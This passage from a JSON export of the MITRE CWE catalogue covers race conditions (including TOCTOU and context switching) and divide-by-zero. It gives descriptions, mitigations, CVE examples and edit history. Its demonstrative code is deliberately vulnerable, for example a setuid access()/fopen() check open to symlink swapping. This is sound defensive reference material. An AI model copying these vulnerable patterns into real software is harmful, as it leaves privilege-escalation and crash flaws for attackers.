References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"}]}},"366":{"attr":{"@_ID":"366","@_Name":"Race Condition within a Thread","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"The main problem is that -- if a lock is overcome -- data could be altered in a bad state."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use locking functionality. This is the recommended solution. Implement some form of locking mechanism around code which alters or reads persistent data in a multithreaded environment."},{"Phase":"Architecture and Design","Description":"Create resource-locking validation checks. If no inherent locking mechanisms exist, use flags and signals to enforce your own blocking scheme when resources are being used by other threads of execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int foo = 0;int storenum(int num) {}","xhtml:br":"","xhtml:div":{"#text":"static int counter = 0;counter++;if (num > foo) foo = num;return foo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public classRace {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"static int foo = 0;public static void main() {}public static class Threader extends Thread {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new Threader().start();foo = 1;","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:br":"","xhtml:div":{"#text":"System.out.println(foo);","attr":{"@_style":"margin-left:10px;"}}}}]}}}}]}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition within a thread"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON32-C","Entry_Name":"Prevent data races when accessing bit-fields from multiple threads","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON40-C","Entry_Name":"Do not refer to an atomic variable twice in an expression","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON43-C","Entry_Name":"Do not allow data races in multithreaded code","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, "Race Conditions", Page 759"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"367":{"attr":{"@_ID":"367","@_Name":"Time-of-check Time-of-use (TOCTOU) Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software checks the state of a resource before using that resource, but the resource\'s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state.","Extended_Description":"This weakness can be security-relevant when an attacker can influence the state of the resource between check and use. This can happen with shared resources such as files, memory, or even variables in multithreaded programs.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"TOCTTOU","Description":"The TOCTTOU acronym expands to \\"Time Of Check To Time Of Use\\"."},{"Term":"TOCCTOU","Description":"The TOCCTOU acronym is most likely a typo of TOCTTOU, but it has been used in some influential documents, so the typo is repeated fairly frequently."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":["Alter Execution Logic","Unexpected State"],"Note":"The attacker can gain access to otherwise unauthorized resources."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Modify Files or Directories","Modify Memory","Other"],"Note":"Race conditions such as this kind may be employed to gain read or write access to resources which are not normally readable or writable by the user in question."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The resource in question, or other resources (through the corrupted one), may be changed in undesirable ways by a malicious user."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If a file or other resource is written in this method, as opposed to in a valid way, logging of the activity may not occur."},{"Scope":["Non-Repudiation","Other"],"Impact":"Other","Note":"In some cases it may be possible to delete files a malicious user might not otherwise have access to, such as log files."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check."},{"Phase":"Implementation","Description":"When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement."},{"Phase":"Architecture and Design","Description":"Limit the interleaving of operations on files from multiple processes."},{"Phase":["Implementation","Architecture and Design"],"Description":"If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed."},{"Phase":"Implementation","Description":"Recheck the resource after the use call to verify that the action was taken appropriately."},{"Phase":"Architecture and Design","Description":"Ensure that some environmental locking mechanism can be used to protect resources effectively."},{"Phase":"Implementation","Description":"Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code checks a file, then updates its contents.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct stat *sb;...lstat(\\"...\\",sb); // it has not been updated since the last time it was readprintf(\\"stated file\\\\n\\");if (sb->st_mtimespec==...){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"print(\\"Now updating things\\\\n\\");updateThings();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Potentially the file could have been updated between the time of the check and the lstat, especially since the printf has latency."},{"Intro_Text":"The following code is from a program installed setuid root. The program performs certain file operations on behalf of non-privileged users, and uses access checks to ensure that it does not use its root privileges to perform operations that should otherwise be unavailable the current user. The program uses the access() system call to check if the person running the program has permission to access the specified file before it opens the file and performs the necessary operations.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if(!access(file,W_OK)) {}else {}","xhtml:div":[{"#text":"f = fopen(file,\\"w+\\");operate(f);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"fprintf(stderr,\\"Unable to open file %s.\\\\n\\",file);","xhtml:br":""}}],"xhtml:br":""}},"Body_Text":"The call to access() behaves as expected, and returns 0 if the user running the program has the necessary permissions to write to the file, and -1 otherwise. However, because both access() and fopen() operate on filenames rather than on file handles, there is no guarantee that the file variable still refers to the same file on disk when it is passed to fopen() that it did when it was passed to access(). If an attacker replaces file after the call to access() with a symbolic link to a different file, the program will use its root privileges to operate on the file even if it is a file that the attacker would otherwise be unable to modify. By tricking the program into performing an operation that would otherwise be impermissible, the attacker has gained elevated privileges. This type of vulnerability is not limited to programs with root privileges. If the application is capable of performing any operation that the attacker would not otherwise be allowed perform, then it is a possible target."},{"attr":{"@_Demonstrative_Example_ID":"DX-49"},"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();if(is_link($filename)){}if(fileowner($filename) == $user){}else{}","xhtml:br":["","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$filename = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0813","Description":"A multi-threaded race condition allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0813"},{"Reference":"CVE-2004-0594","Description":"PHP flaw allows remote attackers to execute arbitrary code by aborting execution before the initialization of key data structures is complete.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594"},{"Reference":"CVE-2008-2958","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958"},{"Reference":"CVE-2008-1570","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Time-of-check Time-of-use race condition"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"File Access Race Conditions: TOCTOU"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Time of check, time of use race condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO01-C","Entry_Name":"Be careful using functions that use file names for identification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"27"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-367"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "TOCTOU", Page 527"}}]},"Notes":{"Note":[{"#text":"TOCTOU issues do not always involve symlinks, and not every symlink issue is a TOCTOU problem.","attr":{"@_Type":"Relationship"}},{"#text":"Non-symlink TOCTOU issues are not reported frequently, but they are likely to occur in code that attempts to be secure.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Observed_Examples, Other_Notes, References, Relationship_Notes, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Time-of-check Time-of-use Race Condition","attr":{"@_Date":"2008-10-14"}}}},"368":{"attr":{"@_ID":"368","@_Name":"Context Switching Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product\'s behavior during the switch.","Extended_Description":"This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the browser is transitioning from a trusted to an untrusted domain, or vice versa, and the browser performs the actions on one domain using the trust level and resources of the other domain.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"364","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This weakness can be primary to almost anything, depending on the context of the race condition."},{"Ordinality":"Resultant","Description":"This weakness can be resultant from insufficient compartmentalization (CWE-653), incorrect locking, improper initialization or shutdown, or a number of other weaknesses."}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1837","Description":"Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837"},{"Reference":"CVE-2004-2260","Description":"Browser updates address bar as soon as user clicks on a link instead of when the page has loaded, allowing spoofing by redirecting to another page using onUnload method. ** this is one example of the role of \\"hooks\\" and context switches, and should be captured somehow - also a race condition of sorts **","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2260"},{"Reference":"CVE-2004-0191","Description":"XSS when web browser executes Javascript events in the context of a new page while it\'s being loaded, allowing interaction with previous page in different domain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0191"},{"Reference":"CVE-2004-2491","Description":"Web browser fills in address bar of clicked-on link before page has been loaded, and doesn\'t update afterward.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2491"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Context Switching Race Condition"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}}},"Notes":{"Note":[{"#text":"Can overlap signal handler race conditions.","attr":{"@_Type":"Relationship"}},{"#text":"Under-studied as a concept. Frequency unknown; few vulnerability reports give enough detail to know when a context switching race condition is a factor.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"369":{"attr":{"@_ID":"369","@_Name":"Divide By Zero","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product divides a value by zero.","Extended_Description":"This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"A Divide by Zero results in a crash."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java example contains a function to compute an average but does not validate that the input value used as the denominator is not zero. This will create an exception for attempting to divide by zero. If this error is not handled by Java exception handling, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public int computeAverageResponseTime (int totalTime, int numRequests) {}","xhtml:div":{"#text":"return totalTime / numRequests;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public int computeAverageResponseTime (int totalTime, int numRequests) throws ArithmeticException {}","xhtml:div":{"#text":"if (numRequests == 0) {}return totalTime / numRequests;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Division by zero attempted!\\");throw ArithmeticException;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":""}}}],"Body_Text":"By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. The following Java code example will validate the input value, output an error message, and throw an exception."},{"Intro_Text":"The following C/C++ example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"double divide(double x, double y){}","xhtml:div":{"#text":"return x/y;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"const int DivideByZero = 10;double divide(double x, double y){}...try{}catch( int i ){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"if ( 0 == y ){}return x/y;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw DivideByZero;","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""},{"#text":"divide(10, 0);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if(i==DivideByZero) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"cerr<<\\"Divide by zero error\\";","attr":{"@_style":"margin-left:10px;"}}}]}}],"Body_Text":"By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. If the method is called and a zero is passed as the second argument a DivideByZero error will be thrown and should be caught by the calling block with an output message indicating the error.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-371"}}}},{"Intro_Text":"The following C# example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int Division(int x, int y){}","xhtml:div":{"#text":"return (x / y);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"int SafeDivision(int x, int y){}","xhtml:div":{"#text":"try{}catch (System.DivideByZeroException dbz){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return (x / y);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.Console.WriteLine(\\"Division by zero attempted!\\");return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}],"Body_Text":"The method can be modified to raise, catch and handle the DivideByZeroException if the input value used as the denominator is zero.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-372"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-3268","Description":"Invalid size value leads to divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3268"},{"Reference":"CVE-2007-2723","Description":"\\"Empty\\" content triggers divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2723"},{"Reference":"CVE-2007-2237","Description":"Height value of 0 triggers divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2237"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP03-C","Entry_Name":"Detect and handle floating point errors"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT33-C","Entry_Name":"Ensure that division and remainder operations do not result in divide-by-zero errors","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM02-J","Entry_Name":"Ensure that division and modulo operations do not result in divide-by-zero errors"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 